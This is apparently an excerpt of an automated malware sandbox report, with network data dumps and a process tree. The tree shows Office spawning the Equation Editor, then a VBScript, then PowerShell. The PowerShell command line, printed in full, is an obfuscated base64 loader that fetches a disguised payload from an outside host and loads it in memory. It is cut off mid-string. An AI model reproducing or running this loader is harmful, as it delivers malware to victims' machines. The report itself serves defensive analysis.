                                                                      2024-08-28 04:54:10 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                                      Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                                      2024-08-28 04:54:10 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                                      Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                                      2024-08-28 04:54:10 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                                      Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                                      2024-08-28 04:54:10 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                                      Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                                      2024-08-28 04:54:10 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                                      Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                                      2024-08-28 04:54:10 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                                      Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                                      2024-08-28 04:54:10 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                                      Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                                      2024-08-28 04:54:10 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                                      Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:00:52:59
                                                                      Start date:28/08/2024
                                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                      Imagebase:0x13f4b0000
                                                                      File size:28'253'536 bytes
                                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:4
                                                                      Start time:00:53:50
                                                                      Start date:28/08/2024
                                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                      Imagebase:0x13f280000
                                                                      File size:1'423'704 bytes
                                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:9
                                                                      Start time:00:54:02
                                                                      Start date:28/08/2024
                                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                      Imagebase:0x400000
                                                                      File size:543'304 bytes
                                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:00:54:04
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs"
                                                                      Imagebase:0xb80000
                                                                      File size:141'824 bytes
                                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:00:54:05
                                                                      Start date:28/08/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?RQBO? ? ? ? ?EQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?E8? ? ? ? ?Zg? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?w? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQBn? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?r? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C4? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?LQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?UwB1? ? ? ? ?GI? ? ? ? ?cwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?L? ? ? ? ?? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?T? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?ZwB0? ? ? ? ?Gg? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?EM? ? ? ? ?bwBu? ? ? ? ?HY? ? ? ? ?ZQBy? ? ? ? ?HQ? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?RgBy? ? ? ? ?G8? ? ? ? ?bQBC? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?QwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FI? ? ? ? ?ZQBm? ? ? ? ?Gw? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?aQBv? ? ? ? ?G4? ? ? ? ?LgBB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?T? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?YwBv? ? ? ? ?G0? ? ? ? ?bQBh? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?d? ? ? ? ?B5? ? ? ? ?H? ? ? ? ?? ? ? ? ?ZQ? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? 